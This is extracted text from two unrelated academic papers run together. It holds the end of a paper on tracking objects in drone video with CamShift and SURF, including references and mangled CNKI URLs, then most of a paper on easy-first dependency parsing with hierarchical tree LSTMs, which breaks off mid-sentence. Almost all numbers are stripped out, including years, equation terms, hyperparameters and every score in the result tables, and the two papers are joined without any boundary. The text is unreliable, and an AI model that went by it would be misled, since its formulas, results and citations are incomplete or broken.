interestfor detection which is one of the pixel points in the scale and the remaining points in the scale is compared with the pixel pointsin each of theadjacenttwo scale layers above and below it to complete the calculation of points in the three-dimensional domain. c. precisely locate extremum the three-dimensional linear interpolation method removes the points whose valuesare less than a certain threshold, but the sub-pixel point of interest can be obtained, and the extremumbe increased, the number of detected point of interest is therefore reduced, and finally several highly-featured points are detected and the amount of workis reduced [ ]. d. select the main orientation of the point of interest in order to ensure the rotational invariance, the gradient histogram is not countedin the surf, but the haar wavelet response around the point of interestregion is computed [ ]. that is, centering on the point of interest, within the circular neighborhood of a radius of s (s is the scale of the point of interest), the haar wavelet side length is s, and the haar wavelet response of all points in the degree fan in both x- and y-directions is computed. sum, and assign a gaussian weight coefficient to the haar wavelet responses, to improve the contribution of the response close to the point of interest, suppress the contribution of the response away from the point of interest, and then add the response within the range of degrees, eventually yielding a new vector, traversing the whole circular region. the main orientation of the point of interestwas defined by the orientation of the longest vector [ ]. e. construct descriptor of the surf point of interest[ ] extract a square region around the point of interest. the size of the window is s. the orientation of the region is the main orientation detected in step . . the region is then divided into sub-regions, each of which the haar wavelet responses of the x- and y-direction of pixels are summed, where the x- and y-directions are relative to the main orientation. the haar wavelet response is the sum of the horizontal direction, the sum of the absolute values in the horizontal direction, the sum of the vertical directions, and the sum of the absolute values in the vertical direction. iv. extract and match the point of interest ( )select a frame from the drone tracking video and extract the points of interest using surf detection method, as shown in figure . international journal of advanced network, monitoring and controls volume , no. , figure . extract points of interest ( )matching the target region. after selecting the target region, extract the target regions in the adjacent two frames and match the points of interest of the two frames. in figure , it can be seen that points of interest are successfully matched. figure . matching the points of interest v. verification after manually selecting the target window, the feedback mechanism is used to calculate the color similarity between the camshift tracking window and the initial window, and the feature similarity between the surf tracking window and the initial window. suppress the major displacement, and assign the weight of displacement dynamically to the two tracking algorithms in accordance with bhattacharyya distance [ ]. the camshift tracking algorithm is preferred when the motion tracking is stable, and otherwise, the surf tracking method [ ] is preferred. the experiments show that the tracking method is ideal for tracking, and it can solve the problem of tracking interference caused by background changes and object similarity. takes a picture of tracking object every seconds, and an example is shown in figures , , , and . figure . tracking image figure . tracking image figure . tracking image international journal of advanced network, monitoring and controls volume , no. , figure . tracking image as shown in the above figures , , , and , the drone has achieved good results in tracking the moving object. vi. conclusion based on the classic tracking algorithm camshift and focused on the deficiencies of the algorithm in the motion object tracking of drone video, this paper proposes the combination of camshift algorithm and surf feature detection to realize the tracking of motion object in uav video. the experimental results show that the proposed method can effectively track and locate the target object in the more complex aerial photography background. the experiment has achieved good results, basically realizes the tracking of the moving object, and the tracking speed is fast, thus the real-time performance is satisfactory and the timeconsumption is little. however, in practical applications, the environment of the object tracking is more complicated and diverse. the further study of this paper can be carried out in the following respects: this paper only studied the tracking of a single object, which does not involve the tracking of multiple similar objects. the multi-object tracking has practical significance in video surveillance, intelligent traffic detection, air formation, and geographic monitoring. therefore, it is very necessary to further study the tracking of multiple objects; the object tracking system in this paper needs to be improved, including optimization of the logic system and add the feature of parallel processing to improve the tracking efficiency of the system. the camshift algorithm in this paper is still based on color histogram, which is sensitive to changes in illuminance and the change in color of objects. when the resolution of the camera is not high and the ambient light is insufficient, the tracking effect is not good,therefore the study should focus on the tracking of physical features that are insensitive to illumination. references [ ] liu yanli, tang xianqi, chen yuedong. application research of moving target tracking algorithm based on improved camshift [j]. journal of anhui polytechnic university, , ( ): - . [ ] xiong tan, xuchu yu, jingzheng liu, weijie huang. object fast tracking based on unmanned aerial vehicle video[c]//proceedings of paciia, ieee presss, : - . [ ] c. harris, m. j. stephens. a combined corner and edge detector[c]. prco of the th alvey vision conf, : - . [ ] d. g. lowe. distinctive image features from scale-invariant keypoints[j]. international journal of computer vision. , ( ): - . [ ] c. harris, m. j. stephens. a combined corner and edge detector[c]. prco of the th alvey vision conf, : - . [ ] d. g. lowe. distinctive image features from scale-invariant keypoints[j]. international journal of computer vision. , ( ): - . [ ] liu yawei. review of target detection and tracking methods in uav aerial photography video [j]. airborne missile, .( ): - . [ ] yan k,sukthankar:a more distinctive representation for local image descriptors[c]//proceedingsofcvpr,los alamitos,ieee press, : - . [ ] bay h,ess a,tuytelaars t.speeded up robust features(surf).[j]computer vision and image understanding, , ( ): - . [ ] leutenegger s,chli m,siegwart r.brisk:binary robust invariant scalable keypoints.[c]//proceedings of iccv,ieee press, : - . [ ] cui zhe. image feature point extraction and matching based on sift algorithm [d]. xi 'an: xidian: university. : - . [ ] yu huai, yang wen. a fast feature extraction and matching algorithm for uav aerial images [j]. journal of electronics and information technology, , ( ): - . [ ] wang jianxiong. research on key technologies of low altitude photogrammetry of unmanned airship and practice of large scale map formation [d]. xi 'an: chang 'an university, : - . [ ] li yifei, research on pid control in four-rotor aircraft,[j] technology and market, . : - . [ ] li xiang, wang yongjun, li zhi, misalignment error and correction of attitude system vector sensor,[j] journal of sensor technology, . : - . [ ] wang donghua, yue dawei. design and implementation of large remote sensing image correction effect detection system,[j] computer programming skills and maintenance, . : - . http://kns.cnki.net/kcms/detail/detail.aspx?dbcode=sjes&filename=sjes &v=mtmyota uffil lyumrhzxjxuvrnbndazvp sglublu n pkbg jynhnpu pzk myks shretnfvouvat nqkhreg ctvq va==&uid=weevrecwsljhsldra fhb jsnzpz ywkh ouzsbjywy piagnmdmlktt =$ a hf_yauvq obgvaqnkpcycejkensw ggi fm gtkoukaid j gfw!! http://kns.cnki.net/kcms/detail/detail.aspx?dbcode=sjes&filename=sjes &v=mtmyota uffil lyumrhzxjxuvrnbndazvp sglublu n pkbg jynhnpu pzk myks shretnfvouvat nqkhreg ctvq va==&uid=weevrecwsljhsldra fhb jsnzpz ywkh ouzsbjywy piagnmdmlktt =$ a hf_yauvq obgvaqnkpcycejkensw ggi fm gtkoukaid j gfw!! http://kns.cnki.net/kcms/detail/detail.aspx?dbcode=sjes&filename=sjes &v=mtmyota uffil lyumrhzxjxuvrnbndazvp sglublu n pkbg jynhnpu pzk myks shretnfvouvat nqkhreg ctvq va==&uid=weevrecwsljhsldra fhb jsnzpz ywkh ouzsbjywy piagnmdmlktt =$ a hf_yauvq obgvaqnkpcycejkensw ggi fm gtkoukaid j gfw!! http://scholar.cnki.net/result.aspx?q=brisk:binary% robust% invatiant% scalable% keypoints http://scholar.cnki.net/result.aspx?q=brisk:binary% robust% invatiant% scalable% keypoints http://scholar.cnki.net/result.aspx?q=brisk:binary% robust% invatiant% scalable% keypoints easy-first dependency parsing with hierarchical tree lstms eliyahu kiperwasser computer science department bar-ilan university ramat-gan, israel elikip@gmail.com yoav goldberg computer science department bar-ilan university ramat-gan, israel yoav.goldberg@gmail.com abstract we suggest a compositional vector represen- tation of parse trees that relies on a recursive combination of recurrent-neural network en- coders. to demonstrate its effectiveness, we use the representation as the backbone of a greedy, bottom-up dependency parser, achiev- ing very strong accuracies for english and chinese, without relying on external word embeddings. the parser’s implementation is available for download at the first author’s webpage. introduction dependency-based syntactic representations of sen- tences are central to many language processing tasks (kübler et al., ). dependency parse-trees en- code not only the syntactic structure of a sentence but also many aspects of its semantics. a recent trend in nlp is concerned with encod- ing sentences as vectors (“sentence embeddings”), which can then be used for further prediction tasks. recurrent neural networks (rnns) (elman, ), and in particular methods based on the lstm archi- tecture (hochreiter and schmidhuber, ), work very well for modeling sequences, and constantly obtain state-of-the-art results on both language- modeling and prediction tasks (see, e.g. (mikolov et al., )). several works attempt to extend recurrent neu- ral networks to work on trees (see section for a brief overview), giving rise to the so-called recursive neural networks (goller and kuchler, ; socher et al., ). however, recursive neural networks do not cope well with trees with arbitrary branch- ing factors – most work require the encoded trees to be binary-branching, or have a fixed maximum arity. other attempts allow arbitrary branching factors, at the expense of ignoring the order of the modifiers. in contrast, we propose a tree-encoding that nat- urally supports trees with arbitrary branching fac- tors, making it particularly appealing for depen- dency trees. our tree encoder uses recurrent neural networks as a building block: we model the left and right sequences of modifiers using rnns, which are composed in a recursive manner to form a tree (sec- tion ). we use our tree representation for encoding the partially-built parse trees in a greedy, bottom-up dependency parser which is based on the easy-first transition-system of goldberg and elhadad ( ). using the hierarchical tree lstm representa- tion, and without using any external embeddings, our parser achieves parsing accuracies of . uas and . las on the ptb (stanford dependencies) and . uas and . las on the chinese tree- bank, while relying on greedy decoding. to the best of our knowledge, this is the first work to demonstrate competitive parsing accuracies for full-scale parsing while relying solely on recursive, compositional tree representations, and without us- ing a reranking framework. we discuss related work in section . while the parsing experiments demonstrate the suitability of our representation for capturing the structural elements in the parse tree that are useful for predicting parsing decisions, we are interested in exploring the use of the rnn-based compositional vector representation of parse trees also for seman- transactions of the association for computational linguistics, vol. , pp. – , . action editor: noah smith. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. tic tasks such as sentiment analysis (socher et al., b; tai et al., ), sentence similarity judge- ments (marelli et al., ) and textual entailment (bowman et al., ). background and notation . dependency-based representation a dependency-based syntactic representation is cen- tered around syntactic modification relations be- tween head words and modifier words. the result are trees in which each node is a word in the sen- tence, and every node except for one designated root node has a parent node. a dependency tree over a sentence with n words w , . . . ,wn can be repre- sented as a list of n pairs of the form (h,m), where ≤ h ≤ n and ≤ m ≤ n. each such pair rep- resents an edge in the tree in which h is the index of a head word (including the special root node ), and m is the index of a modifier word. in or- der for the dependency trees to be useful for actual downstream language processing tasks, each edge is labeled with a syntactic relation. the tree represen- tation then becomes a list of triplets (h,m,`), where ≤ ` ≤ l is the index of a dependency relation out of a designated set of l syntactic relations. dependency trees tend to be relatively shallow, with some nodes having many children. looking at trees in the ptb training set we find that % of the trees have a height of at most , and % of the trees a height of at most . in terms of width, % of the trees have at least one node with an arity of or more, and % of the trees have at least one node with an arity of or more. . recurrent networks and lstms recurrent neural networks (rnns), first proposed by elman ( ) are statistical learners for model- ing sequential data. in this work, we use the rnn abstraction as a building block, and recursively com- bine several rnns to obtain our tree representa- tion. we briefly describe the rnn abstraction be- low. for further detail on rnns, the reader is re- ferred to sources such as (goldberg, ; bengio and courville, ; cho, ). the rnn abstraction is a function rnn that takes in a sequence of inputs vectors x , . . . ,xn (xi ∈ rdin ), and produces a sequence of state vec- tors (also called output vectors) y , . . . ,yn (yi ∈ rdout ). each yi is conditioned on all the inputs x , . . . ,xi preceding it. ignoring the intermediate outputs y , . . . ,yn− , the rnn can be thought of as encoding the sequence x , . . . ,xn into a final state yn. our notation in this paper follows this view. the rnn is defined recursively using two func- tions: rnn(s ,x , . . . ,xn) = yn = o(sn) si = n(si− ,xi) here, a function n takes as input a vector xi and a state vector si− and returns as output a new state si. one can then extract an output vector yi from si using the function o (the function o is usually the identity function, or a function that returns a subset of the elements in si). taking an algorithmic perspective, one can view the rnn as a state object with three operations: s = rnn.initial() returns a new initial state, s.advance(x) takes an input vector and returns a new state, and s.output() returns the output vector for the current state. when clear from the context, we abbreviate and use the state’s name (s) instead of s.output() to refer to the output vec- tor at the state. the functions n and o defining the rnn are pa- rameterized by parameters θ (matrices and vectors), which are trained from data. specifically, one is usu- ally interested in using some of the outputs yi for making predictions. the rnn is trained such that the encoding yi is good for the prediction task. that is, the rnn learns which aspects of the sequence x , . . . ,xi are informative for the prediction. we use subscripts (i.e. rnnl, rnnr) to indi- cate different rnns, that is, rnns that have differ- ent sets of parameters. specific instantiations of n and o yield differ- ent recurrent network mechanisms. in this work we use the long short term memory (lstm) variant (hochreiter and schmidhuber, ) which is shown to be a very capable sequence learner. however, our algorithm and encoding method do not rely on any specific property of the lstm architecture, and the we follow the notation of goldberg ( ), with the excep- tion of taking the output of the rnn to be a single vector rather than a sequence, and renaming r to n. lstm can be transparently switched for any other rnn variant. tree representation we now describe our method for representing a tree as a d-dimensional vector. we assume trees in which the children are ordered and there are kl ≥ children before the parent node (left children) and kr ≥ children after it (right children). such trees correspond well to dependency tree structures. we refer to the parent node as a head, and to its children as modifiers. for a node t, we refer to its left modifiers as t.l , t.l , . . . , t.lkl and its right modifiers as t.r , t.r , . . . , t.rkr the indices of the modifier are always from the parent outward, that is t.l is the left modifier closest to the head t: t t.r t.r t.r t.r t.l t.l t.l the gist of the idea is to treat the modifiers of a node as a sequence, and encode this sequence us- ing an rnn. we separate left-modifiers from right- modifiers, and use two rnns: the first rnn en- codes the sequence of left-modifiers from the head outwards, and the second rnn the sequence of right-modifiers from the head outwards. the first input to each rnn is the vector representation of the head word, and the last input is the vector rep- resentation of the left-most or the right-most modi- fier. the node’s representation is then a concatena- tion of the rnn encoding of the left-modifiers with the rnn encoding of the right-modifiers. the en- coding is recursive: the representation for each of the modifier nodes is computed in a similar fashion. t r l t.r r t.r r t.r r t.r r t t.l l t.l l t.l l enc(t) rnnr rnnl concatenate and compress more formally, consider a node t. let i(t) be the sentence index of the word corresponding to the head node t, and let vi be a vector corresponding to the ith word in the sentence (this vector captures information such as the word form and its part of speech tag, and will be discussed shortly). the vec- tor encoding of a node enc(t) ∈ rdenc is then de- fined as follows: enc(t) =g(we · (el(t)◦er(t)) + be) el(t) =rnnl(vi(t),enc(t.l ), . . . ,enc(t.lkl)) er(t) =rnnr(vi(t),enc(t.r ), . . . ,enc(t.rkr)) first, the sequences consisting of the head-vector vi(t) followed by left-modifiers and the head-vector followed by right-modifiers are encoded using two rnns, rnnl and rnnr, resulting in rnn states el(t) ∈ rdout and er(t) ∈ rdout . then, the rnn states are concatenated, resulting in a dout- dimensional vector (el(t)◦er(t)), which is reduced back to d-dimensions using a linear transformation followed by a non-linear activation function g. the recursion stops at leaf nodes, for which: enc(leaf) =g(we · (el(leaf)◦er(leaf)) + be) el(leaf) =rnnl(vi(leaf)) er(leaf) =rnnr(vi(leaf)) figure shows the network used for encoding the sentence “the black fox who really likes apples did not jump over a lazy dog yesterday”. . representing words in the discussion above we assume a vector repre- sentation vi associated with the ith sentence word. what does vi look like? a sensible approach would be to take vi to be a function of the word-form and the part-of-speech (pos) tag of the ith word, that is: vi = g(w v · (wi ◦pi) + bv) where wi and pi are the embedded vectors of the word-form and pos-tag of the ith word. this encodes each word in isolation, disregarding its context. the context of a word can be very in- formative regarding its meaning. one way of incor- porating context is the bidirectional rnn (schuster and paliwal, ). bidirectional rnns are shown to be an effective representation for sequence tag- ging (irsoy and cardie, ). bidirectional rnns represent a word in the sentence using a concate- nation of the end-states of two rnns, one running the black fox who really likes apples did not jump over a lazy dog yesterday l r l r l r l r l r l r l r l r l r l l l l lrl r rl r r l r l l r rl r r l r r l l the black reallyfoxl foxr whol whor likesl likesr jumpl jumpr overl overr dogl dogr the black fox who really likes apples who really likes apples really likes apples over a lazy dog apples a lazy dog did not a lazy yesterday the black fox who really likes apples did not jump over a lazy dog yesterday figure : network for encoding the sentence “the black fox who really likes apples did not jump over a lazy dog yesterday”. top: the network structure: boxed nodes represent lstm cells, where l are cells belonging to the left- modifiers sequence model rnnl, and r to the right-modifiers sequence model rnnr. circle nodes represent a concatenation followed by a linear transformation and a non-linearity. bottom: the dependency parse of the sentence. from the beginning of the sentence to the word and the other running from the end to the word. the re- sult is a vector representation for each word which captures not only the word but also its context. we adopt the bidirectional lstm scheme to en- rich our node vector representation, and for an n- words sentence compute the vector representations vi as follows: v′i =g(w v · (wi ◦pi) + bv) fi =lstmf (v ′ ,v ′ , . . . ,v ′ i) bi =lstmb(v ′ n,v ′ n− , . . . ,v ′ i) vi =(fi ◦ bi) we plug this word representation as word vectors, allowing each word vector vi to capture informa- tion regarding the word form and pos-tag, as well as the sentential context it appears in. the bi- lstm encoder is trained jointly with the rest of the network towards the parsing objective, using back- propagation. embedding vectors the word and pos embed- dings wi and pi are also trained together with the network. for the word embeddings, we experiment with random initialization, as well as with initializa- tion using pre-trained word embeddings. our main goal in this work is not to provide top parsing accu- racies, but rather to evaluate the ability of the pro- posed compositional architecture to learn and cap- ture the structural cues that are needed for accurate parsing. thus, we are most interested in the random initialization setup: what can the network learn from the training corpus alone, without relying on exter- nal resources. however, the ability to perform semi-supervised learning by initializing the word-embeddings with vectors that are pre-trained on large amount of unan- notated data is an appealing property of the neural- network approaches, and we evaluate our parser also in this semi-supervised setup. when using pre- trained word embeddings, we follow (dyer et al., ) and use embedding vectors which are trained using positional context (ling et al., ), as these were shown to work better than traditional skip- gram vectors for syntactic tasks such as part-of- speech tagging and parsing. . a note on the head-outward generation why did we choose to encode the children from the head outward, and not the other way around? the head outward generation order is needed to facili- tate incremental tree construction and allow for ef- ficient parsing, as we show in section below. be- sides the efficiency considerations, using the head- outward encoding puts more emphasis on the outer- most dependants, which are known to be the most in- formative for predicting parse structure. we rely on the rnn capability of extracting information from arbitrary positions in the sequence to incorporate in- formation about the head word itself, which appears in the beginning of the sequence. this seems to work well, which is expected considering that the average maximal number of siblings in one direction in the ptb is . , and lstms were demonstrated to capture much longer-range interactions. still, when using the tree encoding in a situation where the tree is fully specified in advance, i.e. for sentence classi- fication, sentence similarity or translation tasks, us- ing a head-inward generation order (or even a bi- directional rnn) may prove to work better. we leave this line of inquiry to future work. the head-outward modifier generation approach has a long history in the parsing literature, and goes back to at least eisner ( ) and collins ( ). in contrast to previous work in which each modi- fier could condition only on a fixed small number of modifiers preceding it, and in which the left- and right- sequences of modifiers were treated as inde- pendent from one another for computational effi- ciency reasons, our approach allows the model to access information from the entirety of both the left and the right sequences jointly. features in transition-based dependency parsers often look at the current left-most and right-most dependents of a given node, and almost never look further than the second left-most or second right-most dependents. second-order graph based dependency parsers (mcdonald, ; eisner, ) also con- dition on the current outermost dependent when generating its sibling. parsing algorithm we now turn to explain how to parse using the tree encoder defined above. we begin by describing our bottom-up parsing algorithm, and then show how the encoded vector representation can be built and main- tained throughout the parsing process. . bottom-up parsing we follow a (projective) bottom-up parsing strategy, similar to the easy-first parsing algorithm of gold- berg and elhadad ( ). the main data-structure in the parser is a list of partially-built parse trees we call pending. for a sentence with words w , . . . ,wn, the pending list is initialized with n nodes, where pending[i] corre- sponds to word wi. the algorithm then chooses two neighbouring trees in the pending list pending[i] and pending[i + ] and either attaches the root of pending[i+ ] as the right-most modifier of the root of pending[i], or attaches the root of pending[i] as the left-most modifier of the root of pending[i + ]. the tree which was treated as modifier is then re- moved from the pending list, shortening it by one. the process ends after n− steps, when a single tree remains in the pending list, which is taken to be the output parse tree. the parsing process is described in algorithm . algorithm parsing : input: sentence w = w , . . . ,wn : for i ∈ , . . . ,n do : pend[i].id ← i : arcs ← [] : while |pend| > do : a ←{(i,d) | ≤ i < |pend|,d ∈{l,r}} : i,d ← select(a) : if d = l then : m,h ← pend[i], pend[i + ] : pend.remove(i) : else : h,m ← pend[i], pend[i + ] : pend.remove(i + ) : arcs.append(h.id,m.id) : return arcs this parsing algorithm is both sound and com- plete with respect to the class of projective depen- dency trees (goldberg and elhadad, ). the al- gorithm depends on non-deterministic choices of an index in the pending list and an attachment direc- tion (line ). when parsing in practice, the non- deterministic choice will be replaced by using a trained classifier to assign a score to each index- direction pair, and selecting the highest scoring pair. we discuss the scoring function in section . , and the training algorithm in section . . bottom-up tree-encoding we would like the scoring function to condition on the vector encodings of the subtrees it aims to con- nect. algorithm shows how to maintain the vec- tor encodings together with the parsing algorithm, so that at every stage in the parsing process each item pending[i] is associated with a vector encoding of the corresponding tree. algorithm parsing while maintaining tree repre- sentations : input: sentence w = w , . . . ,wn : input: vectors vi corresponding to words wi : arcs ← [] : for i ∈ , . . . ,n do : pend[i].id ← i : pend[i].el ← rnnl.init().append(vi) : pend[i].er ← rnnr.init().append(vi) : while |pend| > do : a ←{(i,d) | ≤ i < |pend|,d ∈{l,r}} : i,d ← select(a) : if d = l then : m,h ← pend[i], pend[i + ] : m.c = m.el ◦m.er : m.enc = g(w(m.c) + b) : h.el.append(m.enc) : pend.remove(i) : else : h,m ← pend[i], pend[i + ] : m.c = m.el ◦m.er : m.enc = g(w(m.c) + b) : h.er.append(m.enc) : pend.remove(i + ) : arcs.add(h.id,m.id) : return arcs . labeled tree representation the tree representation described above does not ac- count for the relation labels ` the parsing algorithm assigns each edge. in cases the tree is fully specified in advance, the relation of each word to its head can be added to the word representations vi. however, in the context of parsing, the labels become known only when the modifier is attached to its parent. we thus extend the tree representation by concatenating the node vector representation with a vector repre- sentation assigned to the label connecting the sub- tree to its parent. formally, only the final enc(t) equation changes: enc(t) = g(we · (el ◦er ◦ `) + be) where ` is a learned embedding vector associated with the given label. . scoring function the parsing algorithm relies on a function select(a) for choosing the action to take at each stage. we model this function as: select(a) = argmax(i,d,`)∈ascore(pend,i,d,`) where score(.) is a learned function whose job is to assign scores to possible actions to reflect their quality. ideally, it will not only score correct ac- tions above incorrect ones, but also more confident (easier) actions above less confident ones, in order to minimize error propagation in the greedy parsing process. when scoring a possible attachment between a head h and a modifier m with relation `, the scor- ing function should attempt to reflect the following pieces of information: • are the head words of h and m compatible un- der relation l? • is the modifier m compatible with the already existing modifiers of h? in other words, is m a good subtree to connect as an outer-most mod- ifier in the subtree h? • is m complete, in the sense that it already ac- quired all of its own modifiers? to this end, the scoring function looks at a window of k subtrees to each side of the head-modifier pair (pend[i−k], . . . ,pend[i + + k]) where the neigh- bouring subtrees are used for providing hints regard- ing possible additional modifiers of m and h that are yet to be acquired. we use k = in our experi- ments, for a total of subtrees in total. this win- dow approach is also used in the easy-first parser of goldberg and elhadad (goldberg and elhadad, ) and works that extend it (tratz and hovy, ; ma et al., ; ma et al., ). how- ever, unlike the previous work, which made use of extensive feature engineering and rich feature func- tions aiming at extracting the many relevant linguis- tic sub-structures from the subtrees and their inter- actions, we provide the scoring function solely with the vector-encoding of the subtrees in the window. modeling the labeled attachment score is more difficult than modeling the unlabeled score and is prone to more errors. moreover, picking the label for an attachment will cause less cascading error in contrast to picking the wrong attachment, which will necessarily preclude the parser from reaching the correct tree structure. in order to partially overcome this issue, our scoring function is a sum of two auxil- iary scoring function, one scoring unlabeled and the other scoring labeled attachments. the unlabeled at- tachment score term in the sum functions as a fall- back which makes it easier for a parser to predict the attachment direction even when there is no sufficient certainty as to the label. score(pend,i,d,`) = scoreu(pend,i,d) + scorel(pend,i,d,`) each of scoreu and scorel are modeled as multi- layer perceptrons: scoreu(pend,i,d) = mlpu(xi)[d] scorel(pend,i,d,`) = mlpl(xi)[(d,`)] xi = pend[i− ].c◦ · · · ◦pend[i + ].c where mlpu and mlpl are standard multi- layer perceptron classifiers with one hidden layer (mlpx(x) = w g(w x+b )+b ) and have out- put layers with size and l respectively, [.] is an indexing operation, and we assume the values of d and (d,`) are mapped to integer values. . computational complexity the easy-first parsing algorithm works in o(n log n) time (goldberg and elhadad, ). the parser in this works differ by three aspects: running a bi-lstm encoder prior to parsing (o(n)); maintaining the tree representation during parsing (lines – in algorithm ) which take a constant time at each parsing step; and local scoring using an mlp rather than a linear classifier (again, a constant-time operation). thus, the parser maintains the o(n log n) complexity of the easy-first parser. training algorithm . loss and parameter updates at each step of the parsing process we select the highest scoring action (i,d,`). the goal of training is to set the score function such that correct actions are scored above incorrect ones. we use a margin- based objective, aiming to maximize the margin be- tween the highest scoring correct action and the set of incorrect actions. formally, we define a hinge loss for each parsing step as follows: max{ , −max(i,d,`)∈gscore(pend,i,d,`) +max(i′,d′,`′)∈a\gscore(pend,i,d,`)} where a is the set of all possible actions and g is the set of correct actions at the current stage. as the scoring function depends on vector- encodings of all trees in the window, and each tree- encoding depends on the network’s parameters, each parameter update will invalidate all the vector en- codings, requiring a re-computation of the entire network. we thus sum the local losses through- out the parsing process, and update the parameter with respect to the sum of the losses at sentence boundaries. since we are using hinge loss the gradi- ents will become sparser as the training progresses. fewer non-zero gradients could translate to unreli- able updates. in order to increase gradient stability and training speed, we use a variation of mini-batch in which we update the parameters only after er- rors were made. this assures us a sufficient number of gradients for every update thus minimizing the effect of gradient instability. the gradients of the entire network with respect to the sum of the losses are calculated using the backpropagation algorithm. initial experiments with an sgd optimizer showed very instable results. we settled instead on using the adam optimizer (kingma and ba, ) which worked well without requiring fiddling with learning rates. . error-exploration and dynamic oracle training at each stage in the training process, the parser as- signs scores to all the possible actions (i,d,`) ∈ a. it then selects an action, applies it, and moves to the next step. which action should be chosen? a sensi- ble option is to define g as the set of actions that can lead to the gold tree, and following the highest scor- ing actions in this set. however, using training in this manner tends to suffer from error propagation at test time. the parser sees only states that result from following correct actions. the lack of examples con- taining errors in the training phase makes it hard for the parser to infer the best action given partly erro- neous trees. in order to cope with this, we follow the error exploration training strategy, in which we let the parser follow the highest scoring action in a during training even if this action is incorrect, expos- ing it to states that result from erroneous decisions. this strategy requires defining the set g such that the correct actions to take are well-defined also for states that cannot lead to the gold tree. such a set g is called a dynamic oracle. error-exploration and dynamic-oracles were introduced by goldberg and nivre ( ). the dynamic oracle a dynamic-oracle for the easy-first parsing system we use is presented in (goldberg and nivre, ). briefly, the dynamic- oracle version of g defines the set of gold actions as the set of actions which does not increase the num- ber of erroneous attachments more than the mini- mum possible (given previous erroneous actions). the number of erroneous attachments is increased in three cases: ( ) connecting a modifier to its head prematurely. once the modifier is attached it is re- moved from the pending list and therefore can no longer acquire any of its own modifiers; ( ) connect- ing a modifier to an erroneous head, when the cor- rect head is still on the pending list; ( ) connecting a modifier to a correct head, but an incorrect label. dealing with cases ( ) and ( ) is trivial. to deal with ( ), we consider as correct only actions in which the modifier is complete. to efficiently iden- tify complete modifiers we hold a counter for each word which is initialized to the number of modifiers the word has in the gold tree. when applying an attachment the counter of the modifier’s gold head word is decreased. when the counter reaches , the sub-tree rooted at that word has no pending modi- fiers, and is considered complete. aggressive exploration we found that even when using error-exploration, after one iteration the model remembers the training set quite well, and does not make enough errors to make error-exploration effec- tive. in order to expose the parser to more errors, we employ a cost augmentation scheme: we some- times follow incorrect actions also if they score be- low correct actions. specifically, when the score of the correct action is greater than that of the wrong action but the difference is smaller than the margin constant, we chose to follow the wrong action with probability paug (we use paug = . in our experi- ments). pseudocode for the entire training algorithm is given in the supplementary material. . out-of-vocabulary items and word-dropout due to the sparsity of natural language, we are likely to encounter at test time a substantial number of the words that did not appear in the training data (oov words). oov words are likely even when pre-training the word representations on a large un- annotated corpora. a common approach is to desig- nate a special “unknown-word” symbol, whose as- sociated vector will be used as the word representa- tion whenever an oov word is encountered at test time. in order to train the unknown-word vector, a possible approach is to replace all the words appear- ing in the training corpus less than a certain num- ber of times with the unknown-word symbol. this approach gives a good vector representation for un- known words but at the expense of ignoring many of the words from the training corpus. we instead propose a variant of the word-dropout approach (iyyer et al., ). during training, we replace a word with the unknown-word symbol with probability that is inversely proportional to fre- quency of the word. formally, we replace a word w appearing #(w) times in the training corpus with the unknown symbol with a probability: punk(w) = α #(w) + α using this approach we learn a vector representa- tion for unknown words with minimal impact on the training of sparse words. implementation details our python implementation will be made available at the first author’s website. we use the pycnn wrapper of the cnn library for building the com- putation graph of the network, computing the gradi- ents using automatic differentiation, and performing parameter updates. we noticed the error on the de- velopment set does not improve after iterations over the training set, therefore, we ran the train- ing for iterations. the sentences where shuffled between iterations. non-projective sentences were skipped during training. we use the default parame- ters initialization, step sizes and regularization val- ues provided by the pycnn toolkit. the hyper- parameters of the final networks used for all the re- ported experiments are detailed in table . word embedding dimension pos tag embedding dimension relation embedding dimension hidden units in scoreu hidden units in scorel lstm dimensions (tree) lstm layers (tree) bi-lstm dimensions + bi-lstm layers mini-batch size α (for word dropout) . paug (for exploration training) . g tanh table : hyper-parameter values used in experiments weiss et al ( ) stress the importance of care- ful hyperparameter tuning for achieving top accu- racy in neural network based parser. we did not follow this advice and made very few attempts at hyper-parameter tuning, using manual hill climbing until something seemed to work with reasonable ac- curacy, and then sticking with it for the rest of the experiments. https://github.com/clab/cnn/tree/ master/pycnn experiments and results we evaluated our parsing model to english and chi- nese data. for comparison purposes we followed the setup of (dyer et al., ). data for english, we used the stanford depen- dency (sd) (de marneffe and manning, ) con- version of the penn treebank (marcus et al., ), using the standard train/dev/test splitswith the same predicted pos-tags as used in (dyer et al., ; chen and manning, ). this dataset contains a few non-projective trees. punctuation symbols are excluded from the evaluation. for chinese, we use the penn chinese treebank . (ctb ), using the train/test/dev splits of (zhang and clark, ; dyer et al., ) with gold part- of-speech tags, also following (dyer et al., ; chen and manning, ). when using external word embeddings, we also use the same data as (dyer et al., ). experimental configurations we evaluated the parser in several configurations bot- tomupparser is the baseline parser, not using the tree-encoding, and instead repre- senting each item in pending solely by the vector-representation (word and pos) of its head word. bottomupparser+htlstm is using our hierarchical tree lstm representation. bottomupparser+htlstm+bi-lstm is the hierarchical tree lstm where we additionally use a bi-lstm encoding for the head words. finally, we added external, pre-trained word embeddings to the bottomupparser+htlstm+bi-lstm setup. we also evaluated the final parsers in a –pos setup, in which we did not feed the parser with any pos-tags. results results for english and chinese are pre- sented in tables and respectively. for compar- ison, we also show the results of the stack-lstm transition-based parser model of dyer et al ( ), which we consider to be a state-of-the-art greedy model which is also very competitive with search- based models, with and without pre-trained embed- dings, and with and without pos-tags. we thank dyer et al for sharing their data with us. dev test uas las uas las bottomupparser . . . . +htlstm . . . . +bi-lstm input . . . . +external embeddings . . . . dyer et al ( ) no external . . . . dyer et al ( ) w/ external . . . . c&m ( ) w/ external . . . . bottomup+all–pos . . . . dyer et al ( ) –pos . . . . table : english parsing results (sd) dev test uas las uas las bottomupparser . . . . +htlstm . . . . +bi-lstm . . . . +external embeddings . . . . dyer et al ( ) no external . . . . dyer et al ( ) w/ external . . . . c&m ( ) no external . . . . bottomup+all –pos . . . . dyer et al ( ) –pos . . . . table : chinese parsing results (ctb ) the trends are consistent across the two lan- guages. the baseline bottom-up parser performs very poorly. this is expected, as only the head- word of each subtree is used for prediction. when adding the tree-encoding, results jump to near state- of-the-art accuracy, suggesting that the composed vector representation is indeed successful in captur- ing predictive structural information. replacing the head-words with their bi-lstm encodings results in another increase in accuracy for english, outper- forming the dyer et al (s-lstm no external) models on the test-set. adding the external pre-trained em- beddings further improves the results for both our parser and dyer et al’s model, closing the gap be- tween them. when pos-tags are not provided as input, the numbers 